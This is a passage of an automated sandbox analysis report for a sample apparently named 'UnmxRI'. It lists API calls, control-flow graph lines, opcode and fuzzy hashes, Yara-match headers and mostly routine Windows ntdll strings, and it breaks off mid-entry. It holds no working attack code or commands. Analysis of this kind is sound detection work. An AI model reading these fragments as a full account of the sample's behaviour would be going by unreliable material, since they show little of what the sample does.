                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction ID: 3279074c17d7b690db1f2d3af44d07591e404a2f5c5f886217711e7ecd807d27
                                  • Opcode Fuzzy Hash: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction Fuzzy Hash: 1AE04F767402147BD610FA5ADC01FABB7ACDBC5714F808019FA48A7242CE76B91187F4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 223950775bd89aedc105007af6250a8d62a0853226863e749bb097a5168400ba
                                  • Instruction ID: a11856767b2824dd571eacd08378298d34a79faaf482879d3094d2b8d7d73807
                                  • Opcode Fuzzy Hash: 223950775bd89aedc105007af6250a8d62a0853226863e749bb097a5168400ba
                                  • Instruction Fuzzy Hash: 4590026120240007460571584414616400AD7E2301B55C025E301C590DC625CAA96226
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 85c1b7a7985e97736a0bda968a11c2e5b919248ddc83898fb2fa53fa38d0ba34
                                  • Instruction ID: bb7907eaa22fb6f2295811ee3f39f1b820d3c0cdbee36de34bc5c263746ad59f
                                  • Opcode Fuzzy Hash: 85c1b7a7985e97736a0bda968a11c2e5b919248ddc83898fb2fa53fa38d0ba34
                                  • Instruction Fuzzy Hash: 1F90023120140417D611715845047070009D7D2341F95C416A242C558DD756CB6AA222
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b12c1618569abd2d2734cc0cfbc19f1d2f2b33453eb2166e77c3f5c56339881f
                                  • Instruction ID: 06929106df72ffc00045b8c06b942e422ab1033ee27a07defb8cd5258655930e
                                  • Opcode Fuzzy Hash: b12c1618569abd2d2734cc0cfbc19f1d2f2b33453eb2166e77c3f5c56339881f
                                  • Instruction Fuzzy Hash: B190023120148806D6107158840474A0005D7D2301F59C415A642C658DC795CAA97222
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9c2a4077b708a110f7856d492cbf7528d1ff16c17705fafc1e5f14799b260789
                                  • Instruction ID: 3a0f1ae34f5bf9daeda63350940c730a42cb9109f64e8e98303b49f71b373174
                                  • Opcode Fuzzy Hash: 9c2a4077b708a110f7856d492cbf7528d1ff16c17705fafc1e5f14799b260789
                                  • Instruction Fuzzy Hash: 2190023160550406D600715845147061005D7D2301F65C415A242C568DC795CB6966A3

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 00413E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: #$y14291878$y14291878
                                  • API String ID: 1836367815-3963701365
                                  • Opcode ID: 92e53b7856295067d35fa03e05042c641bb8f4ccdcf1a668511e1427a0d8bd16
                                  • Instruction ID: 9727557bda66fe2707259eabe0eae1d776fd0b8c2952dba9b3d273e4bada4c9c
                                  • Opcode Fuzzy Hash: 92e53b7856295067d35fa03e05042c641bb8f4ccdcf1a668511e1427a0d8bd16
                                  • Instruction Fuzzy Hash: 53117AB2E0835836DB20AD90BD02FEF776C8B41B11F00406AF900BB281C67CAE4247E9

                                  Control-flow Graph

                                  control_flow_graph 18 413d9b-413dd1 call 42a483 call 42ae93 24 413dd7-413e0e call 404a23 call 423fe3 18->24 25 413dd2 call 417583 18->25 30 413e30-413e35 24->30 31 413e10-413e21 PostThreadMessageW 24->31 25->24 31->30 32 413e23-413e2d 31->32 32->30
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 00413E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: c705459bc184b76f80768140e04cc3f0a78c45b20e83c07d9aae79029cdffe56
                                  • Instruction ID: f1ca0926c5bc2796fbc1a252b9af93191358ccc6844b18fdfa677d22cf42928b
                                  • Opcode Fuzzy Hash: c705459bc184b76f80768140e04cc3f0a78c45b20e83c07d9aae79029cdffe56
                                  • Instruction Fuzzy Hash: 90110831E4035877DB21AA919C02FDFBB7C8F41B54F05405AFA047B281D6BC6B068BEA

                                  Control-flow Graph

                                  control_flow_graph 33 413da3-413dd1 call 42a483 call 42ae93 38 413dd7-413e0e call 404a23 call 423fe3 33->38 39 413dd2 call 417583 33->39 44 413e30-413e35 38->44 45 413e10-413e21 PostThreadMessageW 38->45 39->38 45->44 46 413e23-413e2d 45->46 46->44
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 00413E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: 18722e8978270a854517803c38c06521881c1e4ec998581005c27b7273819ca2
                                  • Instruction ID: 5da27b0ec249fa1e4047802df7e0233cfde22ae490be49b1b8cec66c8d967651
                                  • Opcode Fuzzy Hash: 18722e8978270a854517803c38c06521881c1e4ec998581005c27b7273819ca2
                                  • Instruction Fuzzy Hash: 3E01C871E4035877DB11AA919D02FDF7B7C8F41B54F44405AFA047B281D6BC5B0687AA

                                  Control-flow Graph

                                  control_flow_graph 47 428913-428957 call 404ab3 call 4295e3 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(e$A,?,?,?,00000000,e$A,?,00412465,?,?), ref: 00428952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: e$A
                                  • API String ID: 3298025750-1097744505
                                  • Opcode ID: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction ID: 306dcccc7717ca06e6cb9c637d6d05715204a61176a37d71f580e900af5864a9
                                  • Opcode Fuzzy Hash: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction Fuzzy Hash: F5E06DB27402097BDA14EE59EC41EEB73ACEFC4710F404019FA08A7246CA70B9118BF8
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00419BA0,?,?,00419BA0,?,?,?,00419BA0,?,00002000), ref: 004288FF
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction ID: 5da05892f78c69ae145d3c78cfd63c5040b213e0da63c13699ffa099c9818ceb
                                  • Opcode Fuzzy Hash: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction Fuzzy Hash: 13E06D722002057BDA10EE59DC45FDB73ECEFC8710F004419FD08A7242C671B9108BB8
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,?,?,AD9ECF88,?,?,AD9ECF88), ref: 00428993
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 10c1ab4faa58adbda06ec85bfe7b85b649a3711cf4a4a3974394aea0dd5015a8
                                  • Instruction ID: 7f5700d8211b0a7d1b77ea3ac933684ac5d072cde437246ec45ad0249f1159e1
                                  • Opcode Fuzzy Hash: 10c1ab4faa58adbda06ec85bfe7b85b649a3711cf4a4a3974394aea0dd5015a8
                                  • Instruction Fuzzy Hash: 32E046763002147BD620EA5AEC41E9BB7ADDFC5710F50402AFA48AB242C671A9508AE5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 027338e10cab734102bb599729d8fc95ecb8f316688d690991ce5fddb3eaa78c
                                  • Instruction ID: bb474d082fac1af3b01111541aa8a44a2111d560bf077d08218a15e28203e4da
                                  • Opcode Fuzzy Hash: 027338e10cab734102bb599729d8fc95ecb8f316688d690991ce5fddb3eaa78c
                                  • Instruction Fuzzy Hash: 7BB09B719015C5C9DF11E764460C7177955B7D2701F15C065D3038641F4738C2E5E276
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: 94450cbefd09f24d87ba151cecbaa32b273601cdff81b120e94572a5ec76b62f
                                  • Instruction ID: 7fecbcaa5c0afcc5eebf04bcdd180f7b8981febc4467ac0902c7768c748e0536
                                  • Opcode Fuzzy Hash: 94450cbefd09f24d87ba151cecbaa32b273601cdff81b120e94572a5ec76b62f
                                  • Instruction Fuzzy Hash: 9D92BF71608352AFE721DF28C880F6BB7E8BB88710F14492DFA98D7255D774E944CB92
                                  Strings
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0191540A, 01915496, 01915519
                                  • Critical section address., xrefs: 01915502
                                  • Critical section address, xrefs: 01915425, 019154BC, 01915534
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01915543
                                  • corrupted critical section, xrefs: 019154C2
                                  • Address of the debug info found in the active list., xrefs: 019154AE, 019154FA
                                  • Critical section debug info address, xrefs: 0191541F, 0191552E
                                  • undeleted critical section in freed memory, xrefs: 0191542B
                                  • Thread identifier, xrefs: 0191553A
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019154CE
                                  • double initialized or corrupted critical section, xrefs: 01915508
                                  • Invalid debug info address of this critical section, xrefs: 019154B6
                                  • 8, xrefs: 019152E3
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019154E2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 409368d26c1aa5ae2138881f4100fbe272bd41f3600025cfd2824199f2544209
                                  • Instruction ID: fe6c1c8eb1570718f82f52b9a65d91d4a34a896c97b2e17d7818a3b762b22575
                                  • Opcode Fuzzy Hash: 409368d26c1aa5ae2138881f4100fbe272bd41f3600025cfd2824199f2544209
                                  • Instruction Fuzzy Hash: 498190B1A40358EFEB20CF99C885FAEBBB9BB4A714F554119F508F7280D375AA41CB50
                                  Strings
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019124C0
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01912602
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01912412
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019125EB
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0191261F
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01912409
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01912506
                                  • @, xrefs: 0191259B
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01912498
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01912624
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019122E4
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: fe4abbf65c642b5f53c510dc3b310a20ce30a06f6033cfd1780d2b5259ac7067
                                  • Instruction ID: 8304913867f0bf197c732446b5f55fbcb34802456f6c8d0877834f5fb0b5574a
                                  • Opcode Fuzzy Hash: fe4abbf65c642b5f53c510dc3b310a20ce30a06f6033cfd1780d2b5259ac7067
                                  • Instruction Fuzzy Hash: D8024EB1D0022D9BDB21DB58CC80B9AB7B9AB55704F5041DAE60DE7241EB70AFC4CF69
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: 2ec48af82144b6e889d34af328c3b13f0a31ba64e012e28348c3ddd90b7bd67a
                                  • Instruction ID: 345c34963315b745e004ea96dc4481592af8c074042a09dba75832c037ba447f
                                  • Opcode Fuzzy Hash: 2ec48af82144b6e889d34af328c3b13f0a31ba64e012e28348c3ddd90b7bd67a
                                  • Instruction Fuzzy Hash: 98519A719053069BD729DF588888FABBBECEF94341F14492DEA9DC3241E770D608CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: da544709f65f4f0472dda93a46eb06e8b8623d84f0e15bf69439e82aacfbc0e7
                                  • Instruction ID: 248d717c4e74c8ecfab94fc86dcc2cf069843389f47ae75db110395642ea054b
                                  • Opcode Fuzzy Hash: da544709f65f4f0472dda93a46eb06e8b8623d84f0e15bf69439e82aacfbc0e7
                                  • Instruction Fuzzy Hash: 09D1CC31614686DFDB62DF6CC480AADBBF5FF49B05F0C8059F849AB252D7349A82CB11
                                  Strings
                                  • HandleTraces, xrefs: 01928C8F
                                  • AVRF: -*- final list of providers -*- , xrefs: 01928B8F
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01928A3D
                                  • VerifierDebug, xrefs: 01928CA5
                                  • VerifierDlls, xrefs: 01928CBD
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01928A67
                                  • VerifierFlags, xrefs: 01928C50
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: a311c5e23b1f5362a2a933bf8f7a044b2ae7b586bddd08692e7b46281c441a2a
                                  • Instruction ID: a024cf90bfa79b71c6063b3a38b9a1beb71428b08191dfa824384a30621cdbc0
                                  • Opcode Fuzzy Hash: a311c5e23b1f5362a2a933bf8f7a044b2ae7b586bddd08692e7b46281c441a2a
                                  • Instruction Fuzzy Hash: 42912871A05322AFE722EF2CC880F2B77E8AB94B14F05085DFA49AB259D730DD04C795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 6c6f8929e92bf661148dcb9599a23259d7287d38c2024853c56670c9f73b52ae
                                  • Instruction ID: 2dfcff5fd90352c152c7049c344be5ff26021b66a1e927b1bbdb48d5330f7d87
                                  • Opcode Fuzzy Hash: 6c6f8929e92bf661148dcb9599a23259d7287d38c2024853c56670c9f73b52ae
                                  • Instruction Fuzzy Hash: FDA25B70A0562A8FEB65DF18CD887ADBBB5AF45704F5442E9DA0DE7290DB309E81CF40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: b1ff584273e8afb11fe134ed4b6cf60c0ccf9bd2fc0387fdca6715f651669332
                                  • Instruction ID: c9b18a10b2c8703f5a93d2c0186837506bd3c3e9a3641905466f8495eb0efe08
                                  • Opcode Fuzzy Hash: b1ff584273e8afb11fe134ed4b6cf60c0ccf9bd2fc0387fdca6715f651669332
                                  • Instruction Fuzzy Hash: 2F916C70B0031D9BEB35DF2CD884BAE7BA6BB54B24F140119E508EB389E7748A81C7D1
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 018F9A11, 018F9A3A
                                  • LdrpInitShimEngine, xrefs: 018F99F4, 018F9A07, 018F9A30
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018F9A01
                                  • apphelp.dll, xrefs: 01896496
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018F9A2A
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018F99ED
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: 56060e7cfb04c842eb44dc97be2740460e83a28b9acb149629b3e64b7de7cb7c
                                  • Instruction ID: 32fb09066d2b5b6d9e945259405d33bf4ea07809310f62bfa7bae00f30ed33e5
                                  • Opcode Fuzzy Hash: 56060e7cfb04c842eb44dc97be2740460e83a28b9acb149629b3e64b7de7cb7c
                                  • Instruction Fuzzy Hash: 685180716083059FEB25DF28D881BAB77E5FB84748F14091DF685D7261E630EB48CB92
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 018DC6C3
                                  • LdrpInitializeProcess, xrefs: 018DC6C4
                                  • LdrpInitializeImportRedirection, xrefs: 01918177, 019181EB
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 019181E5
                                  • Loading import redirection DLL: '%wZ', xrefs: 01918170
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01918181, 019181F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: ef2916bba861288f67db93dc331a1e3c4b206d2e806eb60b0bbd32d0135d9abc
                                  • Instruction ID: d355c5e42c1002409b860f57da14eacf7e259cbec8c1f03e5dc65435b59b171b
                                  • Opcode Fuzzy Hash: ef2916bba861288f67db93dc331a1e3c4b206d2e806eb60b0bbd32d0135d9abc
                                  • Instruction Fuzzy Hash: C431C2726483469BD220EF2CD986E1A77D5FF94B24F04055CF949EB395E620EE04C7A2
                                  Strings
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0191219F
                                  • RtlGetAssemblyStorageRoot, xrefs: 01912160, 0191219A, 019121BA
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01912180
                                  • SXS: %s() passed the empty activation context, xrefs: 01912165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01912178
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019121BF
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 02ce811721106e4cce13a90392c3b5bbcfd471c45e1556bb0d9ab9199f3eee3d
                                  • Instruction ID: 7e7ddfe57e62d05c26a6ef4c19b316093c5e247dea342ec17abcaf0292a31dba
                                  • Opcode Fuzzy Hash: 02ce811721106e4cce13a90392c3b5bbcfd471c45e1556bb0d9ab9199f3eee3d
                                  • Instruction Fuzzy Hash: 0531E436A403297BE721EB9A8C81F5A7B79EFA5B50F254059FA08E7244D2709F40C6A1
                                  APIs
                                    • Part of subcall function 018E2DF0: LdrInitializeThunk.NTDLL ref: 018E2DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E0D74
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: 908632eb89808ad2461a8472c3fa2a29ade458885675f92468606503dd20d7dc
                                  • Instruction ID: 84c4382794dd982d494ea318fabd29df22a68c201df2552a688ea0c5c19ca39e
                                  • Opcode Fuzzy Hash: 908632eb89808ad2461a8472c3fa2a29ade458885675f92468606503dd20d7dc
                                  • Instruction Fuzzy Hash: 4B427C71A00719DFDB21CF28C894BAAB7F9FF05304F1445A9E989DB245E770AA84CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
